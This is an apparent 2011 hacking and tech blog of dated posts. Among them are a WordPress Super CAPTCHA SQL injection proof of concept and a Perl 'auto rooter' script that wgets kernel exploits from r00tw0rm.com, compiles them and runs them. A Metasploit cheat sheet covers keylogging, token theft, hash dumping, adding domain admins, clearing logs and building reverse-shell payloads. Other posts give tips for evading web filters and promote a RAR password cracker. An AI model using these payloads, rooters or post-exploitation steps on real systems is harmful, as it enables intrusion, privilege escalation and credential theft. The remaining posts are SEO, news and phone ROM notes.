Aug 28, 2011

WordPress Super CAPTCHA plugin 2.2.4 SQL Injection Vulnerability





#Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability
# Date: 2011-08-26
#software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip

# Version: 2.2.4 (tested)
# Notes: user has to be logged in as "admin" and magic_quotes has to be turned off


---
PoC
---
http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20


---------------
Vulnerable code
---------------
if(isset($_REQUEST['markspam']))
    {
    global $wpdb;
    $UIDs = explode(',', $_REQUEST['markspam']);
    echo('<h2>Accounts Flagged</h2>');
    for($i=0;$i<count($UIDs);$i++)
        {
        mysql_query("UPDATE `". $wpdb->users ."` SET `spam`='1' WHERE `ID`='". $UIDs[$i] ."'");
        mysql_query("UPDATE `". $wpdb->users ."` SET `user_status`='1' WHERE `ID`='". $UIDs[$i] ."'");
        echo('<em>USER ID: '. $UIDs[$i] .' marked as spammer.</em><br />');
        }
}



Aug 27, 2011

Adding Google 1+ Button To Your Website / Blog

Adding Google 1+ Button To Your Website / Blog


google.com



1 - Go here ==> http://www.google.com/webmasters/+1/button/


2 - Choose your google 1+ button size and copy paste code given in the box in site


3 - Copy the code and paste where you want the Google 1+ button to appear 



Link Building Explained in Simple



I was going through go4expert and found a very good article about Link Building and it was really good so i thought to post it here

Links are the lifeline for a successful website. Links will generally take the users to the preferred web pages on visiting a website. These links will actually provide a roadmap of the website and its functionalities.


Who should build text links?

It is mandatory that every website owner should start doing link building that would help the number of inbound and outbound links. This will help them in getting better organic traffic in the long run. These links can attract a lot more visitors to the website. Hence, people who would like to kick start their online campaign for marketing and advertising can take these efforts to popularize their website. People who are engaged in constant blogging activities and who want to take their blogs, forums, websites to the next level should also opt for such link building services. 



Why should you do link building? 

Google would like to see the pages of a website to be connected well in an organized manner. It will be beneficial if some of the outbound links that you have added will lead to quality links. The other websites must have a good opinion about your website. So, what is the way to decide about this thought? This point can be proved only if such quality websites have got inbound links to your website. This incident will make sure that other websites would like to associate with your website and it will be considered as a valuable resource to the internet users. If this is the case, Google will find it very hard in preventing your website from getting a top notch search engine ranking.

Why should you be careful with link building?

Link building is not just an ordinary SEO activity. This will help in determining the site’s reputation. If your link building services company does not do any kind of justice, it might harm your reputation with the search engines and might even be blacklisted. It will be possible to generate tons and tons of back links. However, there will not be any quality and all the efforts might go in vain.

Link building should seem to be very natural. It must happen over a period of time and any unprecedented rise in the number of links will raise an alarm with the search engines. If you receive any back link, there should be something which was admired by the other website which made them to have a back link. If the link building services company tries to generate thousands of links in a short span of time, the search engines would assume that you are cheating the system.

Careful link building will help your website to find out anchor text links which will be of great help. These text links are very important as they speak volume about the exact keywords that you would wish to target for. It is not possible to get exact anchor text link every time but a careful link building strategy will be of great help to avail the same.

Link building challenges

The most important hurdle is to get the other websites link with yours. Generating tons of back links in a short span of time should not be a problem. However, Google is not stupid to accept these links instantly. A sudden jump in the number of reciprocal links will ring an alarm. The importance of these links would be treated virtually as zero. Hence, it is important to hire a professional SEO service company to execute the smart strategies to improve your visibility and search engine ranking.

Myths About Links

The biggest myth about links is regarding penalty. Some say outbound links hurts, some think that too fast incoming links hurts. Build deep links to your site's content naturally over a period of time.

The other myth for link building is about website PageRank. Certain people argue that getting back links from websites that has got no relevance is of no use. Even if the site has got no relevance but has got higher PR, it will definitely has an impact in your website. Hence, do not avoid such back links.

How to build links

It makes no sense for me to be saying how to go about building links to your website when you can read The Ultimate Guide to Link Building by Shabbir himself


Quality Back Links

A strong back link is a one when you are linked back from a relevant website with a great amount of authority and quality. If Google believes that a website has great authority over its information, it also assumes that sites that are referred will also be of great quality.

The above described facts and information will be of great help if you want to start up the process of building back links. 



There are many advantages of link building.
1. Link building helps in getting quality traffic from relevant sites which increases sales.
2. Also when there will be high quality incoming links the site will also be seen as a valuable resource.
3. Link building helps in creating awarness, visibility and credibility of your site.
4. The site also obtains wider search engine exposure.
5. It also helps the website get indexed by search engines.



source 

Aug 22, 2011

Auto Rooter Beta 2011 Code


2011 Linux Auto r00t3r Beta version 1.0 works well on unpatched systems. And requires internet connectivity currently for local exploits only.
It is a perl script and very easy to understand, modify and work as per required environment.

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################n";
print "#             (Beta 1.0 )   <a title="Auto rooter" href="http://www.pentestit.com/tag/auto-rooter/">Auto rooter</a> by CrosS           #n";
print "#  Usage :                                                 #n";
print "#    perl $0 root    => To root            #n";
print "#    perl $0 del     => Delete <a title="Exploit" href="http://www.pentestit.com/tag/exploit/">Exploit</a>     #n";
print "#                                                          #n";
print "#       as R00TW0RM - Private Community is back            #n";
print "#                  so Releasing 2011 auto rooter =)        #n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #n";
print "#                                                          #n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #n";
print "#              <a title="http" href="http://www.pentestit.com/tag/http/">http</a>://www.r00tw0rm.com/forum               #n";
print "###########################################################nnn";
 
if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");
}

Aug 15, 2011

Access Blocked Websites in Schools , Colleges and Offices


Hi friends Today we will tell you how to access blocked Websites.Websites like facebook, twitter and other social networking sites are generally blocked in schools, colleges and offices. There exist some tricks by which you can bypass the restrictions and access blocked sites, the most obvious is the use of proxies or Anonymizer websites. But using proxies doesn’t always works as they gets blocked by firewall as well . Here I am listing some other methods to access blocked contents.


1. Use IP instead of URL

Each website has its equivalent ip address . This method works best when blocked sites are stored as a list of URLs .You can use ip address to access blocked contents . For example to access facebook you can use ip address 69.63.189.11 in your address bar . You can use ip-address.com to find the ip address of other websites .


2. Use Google Cache
All major search engines like Google yahoo and Bing stores cached pages of websites themselves . You can access blocked websites by viewing their cached copy on search engines .



3. Translations services
Translation services like Google Translate , translate a website from one language to another and display the translated results on their own page .You can access the blocked website by re-translating blocked url using such online translation services .


4. Retrieve web pages via Email
Web2Mail is a free service that sends any websites into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.


5. WayBack Machine
Wayback machine periodically keeps a copy of almost all websites on the internet from the date they have started . You can access your blocked site by fetching its latest copy from archives .


6. Screen-Resolution.com
Screen-Resolution.com allows you to view any website in a different resolution . This could be an interesting tool to access blocked websites .


7. Google Mobile Search
Google Mobile Search displays a web page as if you are viewing it on a mobile phone .You can use it to access blocked websites but javascript and css will be disabled .


8. Redirect with Short URL service
Short URL service are used for converting a long URL in a shorter one . You can convert your blocked url into a shorter one and use it to access blocked websites . This trick dont always works . The two popular url shortening service are bit.ly and adf.ly


9. USB Browsing
You can use this method if you have access to usb port ,you can load usb with your own portable Firefox, with the portable Tor plugin or you can directly use tor-firefox .or you can use USB browsing using mojo pack or any other software for this method..


10. Proxy Websites
This is the generally known method to access blocked websites . There are thousands of online proxies you can use to surf anonymously or to access blocked websites .


Regards -- Hemal 

Cracking Wirnar Passwords | Recover Wirnar Passwords

Wirnar Password Cracker / Recover 



Download Here

It uses a method called " BruteForce" to crack rar passwords
its easy to use... if any one not understand how to use it...feel free to ask.. :)


Aug 14, 2011

Metasploit Cheat Sheet | Metasploit Commands

Metasploit

I was going through the Metasploit The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns and Mati Aharoni . Guys I must say it is worth reading . 




This is a reference for the most frequently used commands a
nd syntax within Metasploit’s various interfaces

and utilities. 

MSFconsole Commands



show exploits


Show all exploits within the Framework.


show payloads
Show all payloads within the Framework.


show auxiliary
Show all auxiliary modules within the Framework.

search name
Search for exploits or modules within the Framework.

info

Load information about a specific exploit or module.

use name

Load an exploit or module (example: use windows/smb/psexec).

LHOST
Your local host’s IP address reachable by the target, often the public IP
address when not on a local network. Typically used for reverse shells.

RHOST
The remote host or the target.

set function
Set a specific value (for example, LHOST or RHOST).

setg function
Set a specific value globally (for example, LHOST or RHOST).

show options
Show the options available for a module or exploit.

show targets
Show the platforms supported by the exploit.

set target num
Specify a specific target index if you know the OS and service pack.

set payload payload
Specify the payload to use.

show advanced
Show advanced options.

set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

check
Determine whether a target is vulnerable to an attack.

exploit
Execute the module or exploit and attack the target.

exploit -j
Run the exploit under the context of the job. (This will run the exploit
in the background.)

exploit -z
Do not interact with the session after successful exploitation.

exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).


exploit -h

Display help for the exploit command.

sessions -l
List available sessions (used when handling multiple shells).

sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability
was used when exploiting the system.

sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K
Kill all live sessions.

sessions -c cmd
Execute a command on all live Meterpreter sessions.

sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

db_create name
Create a database to use with database-driven attacks (example: db_create
autopwn).

db_connect name
Create and connect to a database for driven attacks (example: db_connect
autopwn).

db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported,
such as –sT –v –P0.)

db_autopwn -h
Display help for using db_autopwn.

db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all
systems.

db_destroy
Delete the current database.
db_destroy user:password@host:port/database
Delete database using advanced options.
 
Meterpreter Commands


help
Open Meterpreter usage help.

run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory.

sysinfo
Show the system information on the compromised target.

ls
List the files and folders on the target.


use priv
Load the privilege extension for extended Meterpreter libraries.

ps
Show all running processes and which accounts are associated with each
process.

migrate PID
Migrate to the specific process ID (PID is the target process ID gained
from the ps command).

use incognito
Load incognito functions. (Used for token stealing and impersonation on
a target machine.)

list_tokens -u
List available tokens on the target by user.

list_tokens -g
List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.

steal_token PID
Steal the tokens available for a given process and impersonate that token.

drop_token
Stop impersonating the current token.

getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple 
attack vectors.


shell
Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i
Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.

rev2self
Revert back to the original user you used to compromise the target.

reg command
Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop number
Switch to a different screen based on who is logged in.

screenshot
Take a screenshot of the target’s screen.

upload file
Upload a file to the target.

download file
Download a file from the target.

keyscan_start
Start sniffing keystrokes on the remote target.

keyscan_dump
Dump the remote keys captured on the target.

keyscan_stop
Stop sniffing keystrokes on the remote target.

getprivs
Get as many privileges as possible on the target.

uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.

background
Run your current Meterpreter shell in the background.

hashdump
Dump all hashes on the target.

use sniffer
Load the sniffer module.

sniffer_interfaces
List the available interfaces on the target.

sniffer_dump interfaceID pcapname
Start sniffing on the remote target.

sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.

sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.

sniffer_stop interfaceID
Stop the sniffer.

add_user username password -h ip
Add a user on the remote target.

add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.

clearev
Clear the event log on the target machine.

timestomp
Change file attributes, such as creation date (antiforensics measure).

reboot
Reboot the target machine.


MSFpayload Commands

 msfpayload -h
List available payloads.

 msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of
these can use any payload).



msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X
payload.exe

Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5
and on port 443, and then save it as a Windows Portable Executable 
named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >

payload.raw

Same as above, but export as raw format. This will be used later in



msfencode.



msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.


msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.


MSFencode Commands


msfencode -h
Display the msfencode help.


msfencode -l
List the available encoders.


msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs,
loop-vbs, asp, war, macho)
Format to display the encoded buffer.


msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5
-t exe
Encode payload.raw with shikata_ga_nai five times and export it to an
output file named encoded_payload.exe.


msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/
_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o
multi-encoded_payload.exe
Create a multi-encoded payload.


msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode;
output in C-style notation.




MSFcli Commands

msfcli | grep exploit
Show only exploits.

msfcli | grep exploit/windows
Show only Windows exploits.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp
LPORT=443 RHOST=172.16.32.142 E

Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload
being delivered to listen on port 443.


Meterpreter Post Exploitation Commands

http://pastebin.com/VmTtcz0A

P.S - This Cheat Sheet is borrowed from

Aug 10, 2011

Hacker Group Anonymous Aims to Destroy Facebook on Nov. 5 fact or romour !!!


Hackivist group Anonymous vows to "kill Facebook" on November 5, citing users' lack of choice in privacy as its reason for attack.

The group of hackers has claimed participation in just about every recent notable hacking attack of this year and successfully broke into 70 law enforcement websites and took down the Syrian Ministry of Defense website this week alone.

This recent interest in Facebook, despite a slew of privacy concerns raised against the social network since its founding, may be a result of Anonymous's recent announcement that it plans to create its own social network, called AnonPlus. After the group's Google+ account, called "Your Anon News," was banned, it began fleshing out AnonPlus.com, "a new social network where there is no fear...of censorship...of blackout...nor of holding back."

Below is a video and statement released by Anonymous explaining the reason for its upcoming battle with the world's largest social network. Let us know your thoughts on the group's statement in the comments below.




Anonymous Statement

Attention citizens of the world,

We wish to get your attention, hoping you heed the warnings as follows:
Your medium of communication you all so dearly adore will be destroyed. If you are a willing hacktivist or a guy who just wants to protect the freedom of information then join the cause and kill facebook for the sake of your own privacy.

Facebook has been selling information to government agencies and giving clandestine access to information security firms so that they can spy on people from all around the world. Some of these so-called whitehat infosec firms are working for authoritarian governments, such as those of Egypt and Syria.

Everything you do on Facebook stays on Facebook regardless of your "privacy" settings, and deleting your account is impossible, even if you "delete" your account, all your personal info stays on Facebook and can be recovered at any time. Changing the privacy settings to make your Facebook account more "private" is also a delusion. Facebook knows more about you than your family.

http://www.physorg.com/news170614271.html
http://itgrunts.com/2010/10/07/facebook-steals-numbers-and-data-from-your-iphone/

You cannot hide from the reality in which you, the people of the internet, live in. Facebook is the opposite of the Antisec cause. You are not safe from them nor from any government. One day you will look back on this and realise what we have done here is right, you will thank the rulers of the internet, we are not harming you but saving you.

The riots are underway. It is not a battle over the future of privacy and publicity. It is a battle for choice and informed consent. It's unfolding because people are being raped, tickled, molested, and confused into doing things where they don't understand the consequences. Facebook keeps saying that it gives users choices, but that is completely false. It gives users the illusion of and hides the details away from them "for their own good" while they then make millions off of you. When a service is "free," it really means they're making money off of you and your information.

Think for a while and prepare for a day that will go down in history. November 5 2011, #opfacebook . Engaged.

This is our world now. We exist without nationality, without religious bias. We have the right to not be surveilled, not be stalked, and not be used for profit. We have the right to not live as slaves.

We are anonymous
We are legion
We do not forgive
We do not forget
Expect us
source ::-mashable

Citigroup hacked again - 92,000 customers info exposed from Japan


For the second time this year, Citigroup has suffered a major breach of its credit customers’ personal information; this time the breach involved 92,400 customers at its Japanese unit. Citigroup's Japanese credit card unit said personal information for more than 92,000 of its customers was illegally sold to a third party.

The information exposed included the names, account numbers addresses, phone numbers birthdates, and sex of 92,408 credit card holders, Citi Cards Japan warned in an advisory (PDF) issued Friday. The personal identification numbers and card security codes were not accessed.

Citi Cards Japan did not mention how customer information was obtained as the sale of such information is currently under investigation. “While the risk of fraud is minimal due to the absence of security information, CCJ has placed internal fraud alerts and enhanced monitoring on all accounts identified, and no unusual or suspicious credit cards transactions relating to these customers have been detected at this point,” according to Citi Card Japan’s statement.

However, Citigroup disclosed that credit card customers had $2.7 million stolen from their accounts as a result of the June data breach. While victimized customers can get new account numbers and aren't responsible for unauthorized charges, consumers have become increasingly wary of how their information is handled by big companies, especially those that handle their money.


SouRce 

Aug 9, 2011

Install Android Gingerbread 2.3 in Samsung Galaxy 5 [I5500/I5503] without rooting

Before going through this post i will suggest you to read previous post for froyo update in samsung galaxy here

The Galaxy 5 I5500, also known as the Corby I5500 has been around in the Android world since June 2010. The phone is one of the lower-end budget friendly Android devices out there who’s time is running out as new devices and ROMs arrive on the scene. However, XDA-Developers forum member subpsyke has recently ported the famous CyanogenMod 7 custom ROM on to the Galaxy 5 which has just given the device a new lease of life. More on the ROM and how to install it after the break.


The release is CM 7.0.3 based on Android 2.3.3 Gingerbread but far from perfect. In no way is this ROM meant as a daily driver, but for those who know their way around ADB, recoveries, ODIN etc., can give this ROM a try and provide the developer with feedback that could help in fixing the bugs or issues that remain. So if you do wish to give it a try, let us point out the working and broken features.








Working features:
* GPS [1]
* WiFi [2]
* WiFi tethering
* 3G
* Sensors [3]
* Brightness controls* Video
* Audio (recording and playback)
* Touchscreen (no multitouch, don't ask because I'm not working on it)
* Root
* Camera (and video recorder)
* Bluetooth [4]

Partially working features:
* Telephony [5]
* Microphone [6]

Not working/unknown features:
* Radio
* MAD Team EXT4 app2sd [7]
* SIM Contacts / SIM Toolkit
* Kies – note: you should never expect a custom rom to work with Kies – Cyanogen or otherwise. You can always downgrade to an official ROM to restore Kies compatibility.
* Hardware encoding/decoding (video acceleration).




Errata:
[1] GPS does not work with the newest Americas baseband ending in JP9. Check your version at Settings -> About phone -> Baseband. If you have the new baseband, you should downgrade to the JP2 baseband to get GPS (and possibly also 3G) working correctly. GPS is confirmed to work correctly on all European basebands (so far).
[2] WiFi functions properly (connect/disconnect, signal strength and mac address are all working correctly). There may still be problems with automatic reconnection from idle states, and if you quickly turn off/on the WiFi device, DHCP may be slow to connect. I'm still working on these problems.
[3] Although the sensors seems to work fine, the sensor daemon is draining battery like crazy. With sensors enabled, the phone does between 800-1000 wakeups a second. With the sensors turned off, the phone does just 70-80 wakeups a second (note: less wakeups = less battery used). Until this daemon problem is fixed, I recommend that you consider disabling the sensors (Settings -> Display -> Auto-rotate screen) for maximum battery savings. Another problem: you must toggle (turn back on and off) this setting after each reboot, or else the battery drain will continue even though the sensors are supposed to be turned off :/.
[4] Your Bluetooth MAC address will not be correct on the very first start (i.e., the first boot after doing a data wipe). However, on the next reboot (and all future reboots) it will use the proper address. In future I hope to resolve this small problem.
[5] When you first boot the phone, if you receive a call and try to answer with the hardware keys, your phone will reboot. You can clear this bug by making an outgoing call after you first turn on the phone. If you do this, the bug will not return until you turn off your phone. If you receive an incoming call but you forgot to clear the bug, answering with the touchscreen controls instead of hardware keys may not cause a reboot.
[6] The microphone beside the earpiece is activated instead of the microphone at your mouth. This means that callers may have problems with call quality, since they're listening to your ear . Until this bug is fixed, I recommend you practice telepathy with your friends (maybe the earpiece microphone will help transmit your thoughts).
[7] I won't add MAD Team app2sd support until this rom is stable (i.e., the microphone, reboot and battery usage bugs are fixed). This should only be used for testing, not for regular use, so I don't want to encourage people to use it so heavily. You can still use Cyanogen's built-in app2sd (the "Move to SD" button) - it's more advanced than Froyo's.




this steps are similar to froyo update that got a huge success for galaxy 5



Requirements:
-->>ODIN installed on your system.download
-->>Samsung USB drivers installed. Download USB drivers for 32 bit Windows | For 64 bit Windows.
-->>CyanogenMod 7 ROM.

Instructions:
  • To begin, download the ROM from the link above and extract it to find a .tar file.
  • Run ODIN, check the One Package option and click on the One Package tab choosing the .tar file you extracted in step 1 when prompted. (If you’re coming from a Froyo or Éclair based ROM, be sure to do a factory reset.)
  • That done, put your phone in download mode by taking the battery out, putting it back in after 5 seconds and pressing the Volume Up key, Center button and the Power button at the same time.
  • Once done, connect it to the PC via USB and click on Start in ODIN.

Once the ROM is flashed, the phone should reboot into CM7. The first boot will be slower then normal and you may see a bootloop but that is normal.



this is similar to this steps...just the .tar file will be different..and u will get gingerbread in your device



note::i personally not suggest u to try this with your phone that is on daily use..if u have another phone for stand by then u can try it for sure ,,it is working great..i have tried it my self.


thanx to cyanogenmod.com/ for thr support..


by - hemal modi

Aug 7, 2011

Apple iCloud PRICING INFO







Apple iCloud Pricing details revealed. 5GB of cloud storage will be free for users and they have to pay in between $20 and $100 a year for additional space. iCloud.com is open for developers now. Users can store videos, songs, pictures and other files for free upto 5GB.




10GB of additional space will cost $20 a year 20GB will cost $40 and 50GB will cost $100 a year. In the UK, this pricing converts to £14 a year for 10GB of extra space, £28 for 20GB and £70 for 50GB.
I JUST SIGN UP THERE USING THERE ADUCATION SUPPORT ACCOUNT...LET ME SEE WHAT HAPPEN NEXT... :]





BY ::- HEMAL MODI

Aug 6, 2011

Increase Your Download Speed | Working Method With Pictures

Increase Your Download Speed |Working Method WithPictures


he use of the terms uploading and downloading often imply that the data sent or received is to be stored permanently, or at least stored more than temporarily. In contrast, the term downloading is distinguished from the related concept of streaming, which indicates the receiving of data that is used near immediately as it is received, while the transmission is still in progress and which may not be stored long-term, whereas in a process described using the term downloading, this would imply that the data is only usable when it has been received in its entirety. Increasingly, websites that offer streaming media or media displayed in-browser, such as YouTube, and which place restrictions on the ability of users to save these materials to their computers after they have been received, say that downloading is not permitted



You Just Got Trolled :P 


Sorry For Making You Disappointed . But This Was  a joke :) 



Spam King arrested for hacking 500,000 Facebook accounts


Sanford Wallace

'Spam King' arrested for hacking 500,000 Facebook accounts

A notorious spammer known as the “Spam King” has surrendered to the FBI on charges of bombarding Facebook users with unwanted messages after breaching the security 500,000 accounts.

Sanford Wallace, 43, also known as "Spamford Wallace" and "David Frederix", was arrested in Las Vegas on Thursday.

Wallace is accused of hacking into 500,000 accounts to harvest friend lists between November 2008 and March 2009. He allegedly used the compromised lists to make more than 27 million unsolicited postings on Facebook walls that appeared to come from friends.
If targets clicked on links within the messages, they were presented with a website designed to fool them into handing over their full name, email address and password, prosecutors said. Finally they would be redirected to affiliate websites that would allegedly pay Wallace “substantial revenue” for traffic.
The scheme relied on vulnerabilities that Wallace discovered in Facebook’s spam filters, according to the indictment.
“To accomplish his scheme, Wallace first tested his spamming capabilities between two Facebook accounts,” it said.

Aug 5, 2011

Installing and Configuring Nessus on Backtrack


Download and Install Nessus From Its Official Website and then

1) Get a free activation key form Tenable/Nessus website

2) Enter the key using nessus-fetch command

/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx
3) Create a user and password
/opt/nessus/sbin/nessus-adduser
4) Start the service
/etc/init.d/nessusd start
5) Start Nessus
https://localhost:8834/

Backtrack - Linux Based Penetration Testing OS

Backtrack the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.


Tools in Backtrack

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for 
Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:

BackTrack arranges tools into 11 categories:
  • Information Gathering
  • Network Mapping
  • Vulnerability Identification
  • Web Application Analysis
  • Radio Network Analysis (802.11, Bluetooth, RFID)
  • Penetration (Exploit & Social Engineering Toolkit)
  • Privilege Escalation
  • Maintaining Access
  • Digital Forensics
  • Reverse Engineering
  • Voice Over IP
Releases







DateRelease
February 5, 2006BackTrack v.1.0 Beta
May 26, 2006The BackTrack project released its first non-beta version (1.0).
March 6, 2007BackTrack 2 final released.
June 19, 2008BackTrack 3 final released.
January 9, 2010BackTrack 4 final release. (Now based on Debian)
May 8, 2010BackTrack 4 R1 release
November 22, 2010BackTrack 4 R2 release
May 10, 2011BackTrack 5 release









 Kudos To - h4ck0lic

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More